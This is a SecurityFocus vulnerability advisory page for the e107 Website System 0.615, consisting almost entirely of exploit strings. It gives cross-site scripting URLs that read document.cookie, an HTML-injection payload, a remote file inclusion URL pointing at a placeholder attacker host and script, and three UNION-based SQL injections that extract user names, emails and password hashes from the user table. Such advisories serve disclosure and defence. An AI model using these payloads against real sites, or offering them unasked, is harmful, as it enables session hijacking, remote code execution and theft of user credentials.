Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

e107 Website System Multiple Vulnerabilities

A number of examples were provided.

- Cross-site scripting:

http://www.example.com/e107_0615/e107_plugins/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22);
//--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/e107_0615/usersettings.php?avmsg=[xss code here]

- HTML injection in the "email article to a friend" and "submit news" pages.:

foobar'><body onload=alert(document.cookie);>

- File inclusion:

http://www.example.com/e107_0615/e107_handlers/secure_img_render.php?p=http://<attacker's host>/<attacker's script>.php

- SQL injection:

http://www.example.com/e107_0615/content.php?content.99/**/UNION/**/SELECT/**/null,null,null,
CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,
null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*

http://www.example.com/e107_0615/content.php?query=content_id=99%20UNION%20select%20null,
CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,
null,null,null,null,null,null%20FROM%20e107_user%20WHERE%20user_id=1/*

http://www.example.com/e107_0615/news.php?list.99/**/UNION/**/SELECT/**/null,null,
CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,
null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*







 

Privacy Statement
Copyright 2009, SecurityFocus